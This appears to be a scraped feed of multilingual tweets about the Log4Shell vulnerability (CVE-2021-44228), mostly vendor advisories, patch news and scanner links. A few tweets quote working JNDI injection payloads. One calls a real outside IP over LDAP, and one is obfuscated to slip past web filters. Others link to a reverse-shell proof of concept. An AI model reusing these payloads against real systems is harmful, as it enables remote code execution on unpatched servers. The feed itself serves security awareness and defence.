2021-12-16 13:41:47La correction de la faille CVE-2021-44228 dans Apache Log4j 2.15.0 était incomplète dans certaines configurations q… https://t.co/JdXYcwhJcz https://twitter.com/i/web/status/1471474254457806851esthete
2021-12-16 13:41:06Une deuxième vulnérabilité de Log4j découverte et un nouveau patch publié . De CVE-2021-44228 à CVE 2021-45046… https://t.co/lrKXBXGfM6 https://twitter.com/i/web/status/1471474608444518401argevise
2021-12-16 13:22:34Surprise, patch your Panorama. CVE-2021-44228 Impact of Log4j Vulnerability CVE-2021-44228 https://t.co/tPKUJsqGAA https://buff.ly/3IFqmSxkentonsmith
2021-12-16 13:21:08承前 "CVE-2021-44228はRemote Code実行脆弱性で、Java Naming and Directory Interfaceの欠陥を利用、Log内で悪意あるCode実行を可能にする。Log4j 2の貢献者は新V… https://t.co/0k9b8Qn9zA https://twitter.com/i/web/status/1471469023674388486kabukawa
2021-12-16 13:11:23SUSE Statement on log4j / log4shell / CVE-2021-44228 / Vulnerability https://t.co/bIc9q2LXKE https://www.suse.com/c/suse-statement-on-log4j-log4shell-cve-2021-44228-vulnerability/howtopam
2021-12-16 13:11:15Using InsightVM to Find Apache Log4j CVE-2021-44228 https://t.co/5j7Isakn1i https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/howtopam
2021-12-16 13:10:59Q's about #Log4Shell (CVE-2021-44228): 1. What is #Log4j? 2. Okay, what is affected? 3. Why is so much stuff affect… https://t.co/TKzfmhC4Xt https://twitter.com/i/web/status/1471466351235514368intruder_io
2021-12-16 13:10:24Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/sHaNLV3Q6W https://dy.si/TipBKStefanicAndrej
2021-12-16 13:02:37Update for Apache Log4j2 Issue (CVE-2021-44228) on #AWS https://t.co/jrhTamXJ4K https://go.aws/3E0E1QsPaganiPablo
2021-12-16 13:02:26TYPO3-PSA-2021-004: Statement on Recent log4j/log4shell Vulnerabilities (CVE-2021-44228) https://t.co/OeTq1PSdkx https://typo3.org/security/advisory/typo3-psa-2021-004typo3_security
2021-12-16 13:02:08Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog… https://t.co/au5OqRnwhF https://twitter.com/i/web/status/1471463987716018179jhondarred
2021-12-16 13:01:59The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/RfmyW15rvX https://twitter.com/i/web/status/1471464034956460040andhanni
2021-12-16 13:01:43CVE-2021-44228 Apache Log4j2 2.14.1 Information Disclosure https://t.co/45vlcxl5dr #log4j2 #log4jshell #CyberSec… https://t.co/NjBNs6mNlN https://www.hack-hub.org/index.php?threads/cve-2021-44228-apache-log4j2-2-14-1-information-disclosure.14/ https://twitter.com/i/web/status/1471464161037230086hackhub_infosec
2021-12-16 12:51:19Hello @IBM Any updates on Datapower concerning CVE-2021-44228 #Log4J ?PSafe_NL
2021-12-16 12:51:05https://t.co/f69YgvA9l8 Good collection of Log4j Vulnerability (CVE-2021-44228) info #log4j #Log4Shell https://github.com/NCSC-NL/log4shellppant
2021-12-16 12:50:41Siemens ProductCERT issued and update: SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-202… https://t.co/7nSEBLqEnQ https://twitter.com/i/web/status/1471461689338048513ICS_SCADA
2021-12-16 12:41:32"Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation" published by Microsoft.… https://t.co/IdDXRWGbnk https://twitter.com/i/web/status/1471457614076669953lazarusholic
2021-12-16 12:41:20Apache Log4jの脆弱性(CVE-2021-44228)の影響について - エキサイト https://t.co/HoU69h4pEX https://t.co/Nl0HhHDOK6 http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-16%2021%3A30 https://www.excite.co.jp/news/article/Dreamnews_0000250374/sec_trend
2021-12-16 12:40:55@TomSellers @ApacheSpark @hadoop Fair enough. I cannot see any relationship to log4Shell or CVE-2021-44228 though.… https://t.co/GcbxFYewqY https://twitter.com/i/web/status/1471458558055231494ScottHi15072746
2021-12-16 12:40:41The Numbers Behind Log4j CVE-2021-44228 - Check Point Software https://t.co/7RppjrpomX https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/#.YbsyjucweJo.twittergntlman
2021-12-16 12:40:28Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability – Virtually Andy https://t.co/mNY3Sievxc https://virtuallyandy.wordpress.com/2021/12/14/using-nsx-ids-ips-to-protect-against-cve-2021-44228-log4shell-vulnerability/iVirtuAlex
2021-12-16 12:31:59In case you work with AWS EMR and are concerned about the lack of patches for Log4Shell (CVE-2021-44228) here is a… https://t.co/uYdQXSGlUW https://twitter.com/i/web/status/1471455602702442496fcerullo
2021-12-16 12:31:48Log4j Security Vulnerabilities CVE-2021-44228 – Mitigation Strategies for TAS Operators. https://t.co/NNwjiE3TfP #tanzuvangaurds #tanzu https://bit.ly/3IQr7YZanilkmudigonda
2021-12-16 12:31:42@jetbrains Ja klar wussten wir das. Und spätestens seit CVE-2021-44228 weiß es der Rest der Welt jetzt auch. 🔫teh_plague
2021-12-16 12:30:59Last week information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apa… https://t.co/05Cl13Y3ma https://twitter.com/i/web/status/1471457042732924939genie_sg
2021-12-16 12:30:51IBM java get defaults (to mitigate CVE-2021-44228 [Score:7] https://t.co/9QH1sZ3CRB https://bit.ly/3sbdnSEStackJava
2021-12-16 12:21:23CVE-2021-44228 എന്നാണ് ഈ വൾനറബിലിറ്റിക്ക് കൊടുത്തിരിക്കുന്ന പേര്. ഇനി പ്രശനം എന്താണെന്ന് നോക്കാം. മുൻപ് പറഞ്ഞത് പോ… https://t.co/gPAMz5ozqY https://twitter.com/i/web/status/1471452629217644544cc__says
2021-12-16 12:21:13Анализ на уязвимостта - CVE-2021-44228 (Log4Shell)– Apache Log4j 2 https://t.co/3Aqz3ZEZy5 (По сигнал на… https://t.co/FEcssToCQj https://buff.ly/3F0MpRi https://twitter.com/i/web/status/1471452893920337921IvankaGrigorova
2021-12-16 12:20:10I think I discovered a new personality trait of myself Yall know about the new log4j (log4shell / CVE-2021-44228) v… https://t.co/WXZsaIdX39 https://twitter.com/i/web/status/1471454963570200576HitoriNobu
2021-12-16 12:00:37We found another vector of the #log4j vulnerability (CVE-2021-44228): #slf4j wrapper. The next payload that works f… https://t.co/aHt321bvL0 https://twitter.com/i/web/status/14714487966473707591a3ysh
2021-12-16 12:00:17Sedikit catatan pribadi tentang Log4shell Vulnerability (CVE-2021-44228) https://t.co/q6hlsdNB7K #log4shell… https://t.co/0YnNCHJdXC https://blog.zetc0.de/2021/12/tentang-log4shell-vulnerability-cve.html https://twitter.com/i/web/status/1471449272399044613zetc0de
2021-12-16 11:50:44CVE-2021-44228 Log4jの脆弱性のAWS環境への影響(via @Pocket) https://t.co/YyKZA56wbS https://pocket.co/xhuAC3renoretriever
2021-12-16 11:50:29サポート技術情報を更新いたしました。 Apache Log4j の脆弱性 (CVE-2021-44228) における弊社製品への影響について https://t.co/96T4qPplRj… https://t.co/oE4a9U5OsX https://support.arcserve.com/s/article/2021121301?language=ja https://twitter.com/i/web/status/1471445971582459913Arcserve_jp
2021-12-16 11:50:15The Numbers Behind Log4j CVE-2021-44228 - Check Point Software https://t.co/JfT31hofOV https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/lumeaseoppc
2021-12-16 11:50:12The Numbers Behind Log4j CVE-2021-44228 - Check Point Software https://t.co/KJIQUPE3U2 https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/petitseo
2021-12-16 11:50:09Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 脆弱性検証レポートの新着記事「Apache Log4jに存在する RCE 脆弱性(CVE-… https://t.co/bv0szh889Q https://twitter.com/i/web/status/1471447279752331268garterblue
2021-12-16 11:40:20Scanning Container Images for CVE-2021-44228 - HackMD https://t.co/2CpGDfdnQt https://buff.ly/3F3YAg6rimmon1971
2021-12-16 11:40:14#Log4j #IBM #WebSphere Advice on responding to CVES CVE-2021-44228, CVE-2021-4104 and CVE-2021-45046 for users of W… https://t.co/hgHWqcpr8t https://twitter.com/i/web/status/1471444330669912067WebSphereMex
2021-12-16 11:40:05Sedikit catatan pribadi tentang log4shell vulnerability (CVE-2021-44228) https://t.co/q6hlsdvrTC https://blog.zetc0.de/2021/12/tentang-log4shell-vulnerability-cve.htmlzetc0de
2021-12-16 11:30:23CVE-2021-44228関連おわったなり。iriyak
2021-12-16 11:30:15成仏する前の遺言。log4jの脆弱性(CVE-2021-44228)に対する攻撃は増加傾向だけどまだ攻撃側も試行錯誤中なのかbotnetで大々的に来てない雰囲気ある。まぁ時間の問題。バリエーションは日々増えてって正直笑える。IPS… https://t.co/iaxKSZOdl9 https://twitter.com/i/web/status/1471440567301447685na_nicomas
2021-12-16 11:20:46Claris ナレッジベースの記事が再度更新されていて、Claris ConnectやClaris FileMaker GoもApache Log4j2の脆弱性(CVE-2021-44228)の影響はない旨の記述が追加されています… https://t.co/2RBhI7xXSB https://twitter.com/i/web/status/1471437465852743681matsuo_atsushi
2021-12-16 11:10:42昨日公開の「Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート」に追加情報を掲載しました。 「Apache Log4jに関する解説 1.1版」… https://t.co/5aCRI06xGi https://twitter.com/i/web/status/1471435282159669252intellilink_pr
2021-12-16 11:10:40Synack, Inc.、クラウドソース・セキュリティテストのSynack、CVE-2021-44228(log4j) へのお客様支援を緊急発表 https://t.co/mBmVPZzJrZ https://newsrelea.se/BP9zYkNewsrelease_IT
2021-12-16 11:10:32Er is volop aandacht voor de ernstige #kwetsbaarheid in logtool Log4j (CVE-2021-44228), beter bekend als ‘Log4Shell… https://t.co/g5ucsvbJLW https://twitter.com/i/web/status/1471435713170354180Axis_NL
2021-12-16 11:10:22Hey, security guys and pntesters! You can now scan for Log4Shell (CVE-2021-44228) using Burp Suite Professional or… https://t.co/JLnAlUjb72 https://twitter.com/i/web/status/1471436352193454080BobbyNiko
2021-12-16 11:10:07Log4jで話題になったWAFの回避/難読化とは何かはじめに 2021年12月に発見されたLog4jのCVE-2021-44228は、稀に見るレベル、まさに超弩級の脆弱性となっています。今回、私はTwitterを主な足がかりとして… https://t.co/6hpKIJ5Esv https://twitter.com/i/web/status/1471436999441661953yobata_tw
2021-12-16 11:00:26Security/2021/12/15/esaにおけるLog4jの脆弱性への対応について: CVE-2021-44228 https://t.co/CLYJzeiSdY https://ift.tt/3ysLfvkmagiauk
2021-12-16 11:00:24Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/mfhuigKEqi https://bit.ly/3GFaDREmattdavies_uk
2021-12-16 10:50:34log4j-finder - Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228… https://t.co/zKPquefRkz https://twitter.com/i/web/status/1471430792349986819pythontrending
2021-12-16 10:50:24Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/EJVuW6HJjG https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/zephel01
2021-12-16 10:50:22Apache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228, CVE-2021-4104, CVE-2021-45046 ) https://t.co/ZJub5dT3w9 https://security.sios.com/vulnerability/misc-security-vulnerability-20211212.htmlzephel01
2021-12-16 10:50:13Apache Log4j2 Issue (CVE-2021-44228) https://t.co/790irbXMco これか https://aws.amazon.com/jp/security/security-bulletins/AWS-2021-005/zephel01
2021-12-16 10:50:10Wow! The Numbers Behind Log4j Vulnerability CVE-2021-44228 @CheckPointSW https://t.co/CGOVLMogCO #InfoSec… https://t.co/p2EVhr6Emh https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/ https://twitter.com/i/web/status/1471432243386236930CITechRPM
2021-12-16 10:40:31Apache Log4j 2 の脆弱性 (CVE-2021-44228)+ ソフトウェアの管理 + 脆弱性情報の管理 - まるちゃんの情報セキュリティ気まぐれ日記 https://t.co/5TIrTftBe5 http://maruyama-mitsuhiko.cocolog-nifty.com/security/2021/12/post-86e11b.htmlzephel01
2021-12-16 10:40:23[UPDATE] Apache has released Log4j version 2.12.2 which fixes CVE-2021-44228 for Java 7. Users who are unable to up… https://t.co/w4TT8HsDSI https://twitter.com/i/web/status/1471428326057078787CSAsingapore
2021-12-16 10:40:14[Notice-CSA] [UPDATE] Apache has released Log4j version 2.12.2 which fixes CVE-2021-44228 for Java 7. Users who are… https://t.co/ntKci5mesy https://twitter.com/i/web/status/1471428520601522176SG_Alerts
2021-12-16 10:40:12Exploitation of #Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration -… https://t.co/KBRDADzYK8 https://twitter.com/i/web/status/1471428811724103683Darren_Desmond
2021-12-16 10:30:05Anyone knows any (actually used) Java apps running on Windows, vulnerable to the Log4j issue CVE-2021-44228? Widely… https://t.co/tqo5rXf5el https://twitter.com/i/web/status/1471426501149138948mkolsek
2021-12-16 10:10:05An internal network honeypot for detecting scans for log4j CVE-2021-44228: https://t.co/4qbgK08NQ3 (by @Binary_Defense) https://bit.ly/3spUn3dberezhasecurity
2021-12-16 10:00:27Oracle Security Blog: Updates about Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046) https://t.co/ztIZyRNZaK https://blogs.oracle.com/security/post/log4j-vulnerabilitiessiebel_ess
2021-12-16 09:50:25Die Sicherheitslücke Log4shell (CVE-2021-44228) in der Java-Bibliothek log4j ist auch eine Bedrohung für viele Besc… https://t.co/NNznFeilMY https://twitter.com/i/web/status/1471416329483833345DGUV
2021-12-16 09:50:21Claris ナレッジベースの記事が更新されています。記事のタイトルが変更され、Claris ConnectやClaris FileMaker GoもLog4j2の脆弱性(CVE-2021-44228)の影響はない旨の記述が追加さ… https://t.co/eVg33VefFr https://twitter.com/i/web/status/1471416679146356736emiccorporation
2021-12-16 09:40:39Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/oV5vu6sblg https://dy.si/FUSPomastr79
2021-12-16 09:40:10Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について 2021年12月14日 警察庁 https://t.co/4HHN5dW1sK https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmlSecurityOsaka
2021-12-16 09:30:25📝 SAF Tehnika is aware of the Log4j CVE-2021-44228 vulnerability, and our currently offered products, solutions, an… https://t.co/FS5fR6U1XN https://twitter.com/i/web/status/1471409964040269825SAFTehnika
2021-12-16 09:30:23There is a new central note from SAP referencing all relevant notes: 3131047-[CVE-2021-44228] Central Security Note… https://t.co/bYeR3uuGqr https://twitter.com/i/web/status/1471410630821388290JensGleichmann
2021-12-16 09:30:13Ataque "de moda" por ejecución remota de código en Apache Log4j (CVE-2021-44228 CVE-2021-45046): NECESARIO actualiz… https://t.co/TORzqoGQLM https://twitter.com/i/web/status/1471411410722861063ticupm
2021-12-16 09:20:15Paid subscriptions now detect CVE-2019-17571 and CVE-2021-44228 vulnerable files. You can now scan your servers for… https://t.co/KGfP77FAE1 https://twitter.com/i/web/status/1471408817053343744SecuriteInfoCom
2021-12-16 09:10:54tacLOM ist von #log4j Schwachstelle CVE-2021-44228 nicht betroffen. Kunden der Log-Management-Lösung von… https://t.co/6UMYluLkvt https://twitter.com/i/web/status/1471404806111735810terreactive
2021-12-16 09:10:10CYBERSECURITY HACKING ATTACK The Numbers Behind Log4j CVE-2021-44228 Check Point Software https://t.co/HVYXIjbgr4 https://t.co/O9LiLLVNxs https://lnkd.in/eAPAQXtQ https://lnkd.in/ecaT5R_Vvilanova_fred
2021-12-16 09:00:43Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について | 警察庁 @police https://t.co/e8uC8Kctku https://ift.tt/3GOMyrpmagiauk
2021-12-16 09:00:37Il rischio di compromissione è alto se un server è vulnerabile a #Log4Shell. Scopri di più su CVE-2021-44228, la vu… https://t.co/ZRc4zczXFF https://twitter.com/i/web/status/1471402776768954370TrendMicroItaly
2021-12-16 08:53:11Excellent blog article for the RCE CVE-2021-44228 in The Apache Software Foundation #log4j issue! #CSPM #CIEM… https://t.co/P56AN1WZMZ https://twitter.com/i/web/status/1471392181768400903VirtualBlackCat
2021-12-16 08:51:48Apache Log4j(CVE-2021-44228)の脆弱性に関する影響について https://t.co/ZHDCdOPXFh https://help.docbase.io/posts/2215345docbaseio
2021-12-16 08:51:22VMware VCenter log4j CVE-2021-44228 缓解: https://t.co/wJqBRdYwvn https://raw.githubusercontent.com/blake-fm/vcenter-log4j/main/log4j-vcenter-6.5-7.0-workaround.shhenices
2021-12-16 08:51:03Support Spotlight: CVE-2021-44228 for log4j and what it means for SAP Business One https://t.co/7Oe2mMuVn3 https://ift.tt/3yuoasaabap4sap
2021-12-16 08:50:57vCENTER SERVER APPLIANCE – CVE-2021-44228 – Remote code execution vulnerability via Apache Log4j https://t.co/JWhxV2T7pb https://blog.ragasys.es/vcenter-server-appliance-cve-2021-44228-remote-code-execution-vulnerability-via-apache-log4jjramosgata
2021-12-16 08:50:54#Log4j2 CVE-2021-44228 #revshell https://t.co/Wgbt9rlEPV GitHub - faisalfs10x/Log4j2-CVE-2021-44228-revshell - Gi… https://t.co/9WoSMVOEcR https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell https://twitter.com/i/web/status/1471398904386228233hack_git
2021-12-16 08:50:32SAP’s Response to CVE-2021-44228 Apache Log4j https://t.co/TlyJwfLnBl https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdfxjhacking
2021-12-16 08:50:25Nieuwe 'pandemie'..? Microsoft: 'Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploit… https://t.co/D1kGsboy4c https://twitter.com/i/web/status/1471400957422546945Simone_Voice
2021-12-16 08:50:17Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について(警察庁 12月14日) https://t.co/ss3tJw90l3 https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmlJPACofficial
2021-12-16 08:39:21AWS continua publicando actualizaciones del boletín de seguridad asociado al CVE-2021-44228 del Log4j. Mantente al… https://t.co/UBmcNN1xRv https://twitter.com/i/web/status/1471389689420656642cmilanf
2021-12-16 08:39:05Since we do not use Log4j, @squadcastHQ is not directly affected by the vulnerability disclosed in CVE-2021-44228.… https://t.co/y1szOb0gnW https://twitter.com/i/web/status/1471394891557048321squadcastHQ
2021-12-16 08:38:30CVE-2021-44228 #Log4Shell, a high-severity #vulnerability is affecting #unpatched #software systems all over the wo… https://t.co/9nlylh55DF https://twitter.com/i/web/status/1471389801311924225isurudharmadasa
2021-12-16 08:36:3412/15【続報】MicrosoftがホストしていないMinecraftサーバーに対するランサムウェア攻撃の詳細と、脅威および脆弱性管理を含む追加の製品ガイダンスを追加しました。 Microsoft CVE-2021-44228… https://t.co/rYBlzdnwjh https://twitter.com/i/web/status/1471392711475605509t_nihonmatsu
2021-12-16 08:26:28Apache Log4j2 2.14.1 RCE (CVE-2021-44228) Bypass WAF 9. ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesiteh… https://t.co/YnfoocNb2p https://twitter.com/i/web/status/1471393319058284546wugeej
2021-12-16 08:24:22I kølvandet på Log4j-sårbarheden (CVE-2021-44228), vil NC3 gøre opmærksom på dette Github-repo fra CISA:… https://t.co/dBwkzMkOJN https://twitter.com/i/web/status/1471393606984511489Rigspoliti_NC3
2021-12-16 08:24:19#Log4j Vulnerability (CVE-2021-44228) Information 📊 #DataScience 🧮 #DataVisualization #DataAnalytics #DataFam https://t.co/Dnc8OyddS8 https://interworks.com/blog/2021/12/14/log4j-vulnerability-cve-2021-44228-information/Rahul_B
2021-12-16 08:20:49#Zeek_IDS / #Zeekurity CVE-2021-44228/Log4j (notice.log) https://t.co/uCmyp9xWPlseguridadyredes
2021-12-16 08:05:47#VxRail VxRail Manager workaround now remediate Log4Shell (CVE-2021-44228/CVE-2021-45046) vulnerabilities. More inf… https://t.co/yEWUzmbs4C https://twitter.com/i/web/status/1471387891477659650VRMware
2021-12-16 08:01:00Update on the Apache Log4j CVE-2021-44228 vulnerability Good news: QRadar SIEM, and the QRadar on Cloud SaaS is no… https://t.co/Vn3bZEEsBS https://twitter.com/i/web/status/1471389433396035584doukkalli
2021-12-16 07:47:23Trend Micro's Web Based scanner for CVE-2021-44228 aka Log4Shell. https://t.co/X8RcRC8koG http://log4j-tester.trendmicro.comcKure7
2021-12-16 07:45:44Claris #FileMaker とApache Log4jのセキュリティ脆弱性(CVE-2021-44228)に関するご案内(続報)を弊社のWebサイトに掲載しました。詳細につきましては https://t.co/k3IL7Cz8GM をご確認ください。 https://support.emic.co.jp/fmplan
2021-12-16 07:43:18จากปัญหาช่องโหว่ไลบรารี log4j หรือเรียกอีกชื่อว่า Log4Shell (หมายเลขช่องโหว่ CVE-2021-44228) ที่กำลังเป็นปัญหาในตอน… https://t.co/AoypOz4Q49 https://twitter.com/i/web/status/1471383937024811009hostatomdotcom
2021-12-16 07:33:39【Apache Log4jの脆弱性について】 Javaのロギングライブラリーの1つである「Apache Log4j(バージョン2)」に任意のコード実行の脆弱性(CVE-2021-44228)が報告されております。 カラーミーショッ… https://t.co/P7d5WD3GkO https://twitter.com/i/web/status/1471379892306866177colormeshop
2021-12-16 07:31:57دوامي بعد ما طلعت هال CVE-2021-44228: Log4j Remote Code Execution https://t.co/wXYmix2cwIobvioUS_44
2021-12-16 07:30:21CVE-2021-44228 Log4jの脆弱性のAWS環境への影響 - Qiita https://t.co/LUK4ZsAoTH https://qiita.com/tsukamoto/items/858f2bb863e75d4225c4sutest1101
2021-12-16 07:20:40Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/U02lPdCMtl https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/rootflag
2021-12-16 07:16:32Firewall Threat Defense (FTD) での CVE-2021-44228 (#Log4j の脆弱性) の検知・防御について、最新情報をブログにまとめました。 詳しくはこちら:… https://t.co/1sxE5HpUGO https://twitter.com/i/web/status/1471374541054226438Cisco_Japan
2021-12-16 07:14:50Example CVE-2021-44228 payload: User agent: nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a} http://159.223.5.30:443… https://t.co/5RSN3KwZhY https://twitter.com/i/web/status/1471375127824588802bad_packets
2021-12-16 07:11:04Centralized list of Storage and Backup systems affected by zero-day log4shell vulnerability (CVE-2021-44228) https://t.co/bUV8f935rc https://cybersec.continuitysoftware.com/s/centralized-list-of-storage-and-backup-systems-affected-by-zero-day-log4shell-vulnerability-cve-2021-44228-2567GutmanYotam
2021-12-16 06:54:16CVE-2021-44228 Log4jの脆弱性のAWS環境への影響 - Qiita https://t.co/RzG3b4EBts https://qiita.com/tsukamoto/items/858f2bb863e75d4225c4it_hatebu
2021-12-16 06:51:15This is horrendous! CVE-2021-44228 is now superseded by CVE-2021-45046! FIXING the FIX!digiuniverse
2021-12-16 06:51:08Guidance for preventing, detecting and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/Y3R6qRdruZ #MicrosoftSecurity https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/jcgm1978
2021-12-16 06:45:25In the light of the latest vulnerability CVE-2021-44228 (Log4Shell) in the Log4j library, we'd like to announce tha… https://t.co/PQ1cNzOvXH https://twitter.com/i/web/status/1471367130281132035planyocom
2021-12-16 06:40:21Here's @nuxeo's answer to CVE-2021-44228 related to Apache Log4j https://t.co/RwDDSipopq #Log4Shell #nuxeo #security https://www.nuxeo.com/blog/apache-log4j/damienmetzler
2021-12-16 06:30:39For those in the #NFT community who are interested on CVE-2021-44228 (Log4j) Java Naming and Directory Interface (… https://t.co/1OOvmlm16R https://twitter.com/i/web/status/1471366740324012035nft_sec
2021-12-16 06:11:23#CloudHedge is aware of the recent #securityissue relating to #ApacheLog4j2 utility CVE-2021-44228. An update to al… https://t.co/e7VwZTg1xd https://twitter.com/i/web/status/1471358202289836037cloudhedgeio
2021-12-16 06:11:11Apache Log4jライブラリに関連した深刻な脆弱性(CVE-2021-44228)の弊社製品への影響について https://t.co/ywNbp2hxrZ https://cba-japan.com/apache-log4j-cve-2021-44228/TaniCba
2021-12-16 06:11:09https://t.co/IhxM8FM0FU open source code reused implicate CVE-2021-44228 #Log4shell in JndiManager.class was borr… https://t.co/Lr8pTDAKCy https://blog.sonatype.com/why-did-log4shell-set-the-internet-on-fire https://twitter.com/i/web/status/1471359691611594752fpientka
2021-12-16 06:10:59IBM DB2 の Apache Log4j の処理に任意のコードを実行される問題 (CVE-2021-44228) [40813] https://t.co/2lyZbRYBZo #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40813softek_jp
2021-12-16 06:10:043129897 - CVE-2021-44228 - Log4j vulnerability - no impact on SAP Adaptive Server Enterprise (ASE)oetgrunnen
2021-12-16 06:02:49#CrowdStrikeIntelligence team findings regarding the #Log4Shell (CVE-2021-44228, 45046) #vulnerabilities indicate w… https://t.co/X7bjgaA7pk https://twitter.com/i/web/status/1471359090655776768Cybersec_India
2021-12-16 05:58:35Log4j: Getting ready for the long haul (CVE-2021-44228) https://t.co/BZ6jlNlW6G https://isc.sans.edu/forums/diary/28130piyokango
2021-12-16 05:56:10Apache Log4jの脆弱性(CVE-2021-44228)の影響について - zakzak:夕刊フジ公式サイト https://t.co/sCpaOxpQCe https://t.co/OcLQdOsxnb http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-16%2014%3A30 https://www.zakzak.co.jp/eco/news/211216/prl2112160139-n1.htmlsec_trend
2021-12-16 05:55:14Since many vendors use the Log4J library in their products, CVE-2021-44228, a code-execution vulnerability in the A… https://t.co/u4UIU0IaLa https://twitter.com/i/web/status/1471352097224466443CswWorks
2021-12-16 05:54:26How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/sB7kxCyaGi https://www.lunasec.io/docs/blog/log4shell-live-patch/JelleVictoor
2021-12-16 05:52:14@Geocortex What is the impact of CVE-2021-44228 Apache Log4j on GeoCortex?Glen_Dhu
2021-12-16 05:50:29CVE-2021-44228の次はCVE-2021-45046が見つかったんですね… https://t.co/YMR1AOWcnK https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/AmyuLilly
2021-12-16 05:48:08Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) – Sysdig https://t.co/ltxISOiKvc https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ohhara_shiojiri
2021-12-16 05:42:37【知財関連ニュース】Apache Log4jの脆弱性(CVE-2021-44228)の影響について[商標][ブランド] https://t.co/i8gxUBMezc https://iptops.com/news/703025iptops_com_news
2021-12-16 05:30:49Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Protect Operations Center (CVE-2021-44228)… https://t.co/eRsYNcUjHH https://twitter.com/i/web/status/1471351394032570373L2clrogers
2021-12-16 05:13:1850件のコメント https://t.co/FfDUyK5zZ0 “Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog” (828 users) https://t.co/l7WtRIMmKQ https://b.hatena.ne.jp/entry/s/piyolog.hatenadiary.jp/entry/2021/12/13/045541#utm_campaign=bookmark_share&utm_content=piyolog.hatenadiary.jp&utm_medium=social&utm_source=twitter&utm_term=%E3%83%86%E3%82%AF%E3%83%8E%E3%83%AD%E3%82%B8%E3%83%BC%20java https://htn.to/4aiHhWdjSZalipeyoff
2021-12-16 05:12:41log4j CVE-2021-44228 対応版がリリースされ、ダウンロード可能になりました。 https://t.co/5EIZ3mbKO1 https://t.co/TxVGKVbxHL http://tableau.com/support/releasesrsugimura17
2021-12-16 05:11:10Favorite part of CVE-2021-44228 is the depth which it may be being carried out isn’t always clear. Am I exploiting… https://t.co/B25I68kevN https://twitter.com/i/web/status/1471346234233442304MorbitCuriosity
2021-12-16 05:01:23Apache Log4j の脆弱性(CVE-2021-44228)の影響につきまして https://t.co/hYFbcgAAOE https://www.getshifter.io/ja/cve-2021-44228-apache-log4j/JP_Getshifter
2021-12-16 05:00:34Apache Log4j の脆弱性(CVE-2021-44228)の影響につきまして | 超高速 WordPress AMI AMIMOTO https://t.co/JudZeUSLdv https://ja.amimoto-ami.com/cve-2021-44228-apache-log4/Amimoto_Ami
2021-12-16 04:47:31GitHub Trending Archive, 14 Dec 2021, Java. kozmer/log4j-shell-poc, logpresso/CVE-2021-44228-Scanner, corretto/hotp… https://t.co/Z6qMFENzVY https://twitter.com/i/web/status/1471336826686537728motakasoft
2021-12-16 04:46:58Apache Log4jの脆弱性(CVE-2021-44228)の影響について - ドリームニュース https://t.co/HnVcQ5nvAT https://t.co/ivoCGdOq7U http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-16%2013%3A30 https://www.dreamnews.jp/press/0000250374/sec_trend
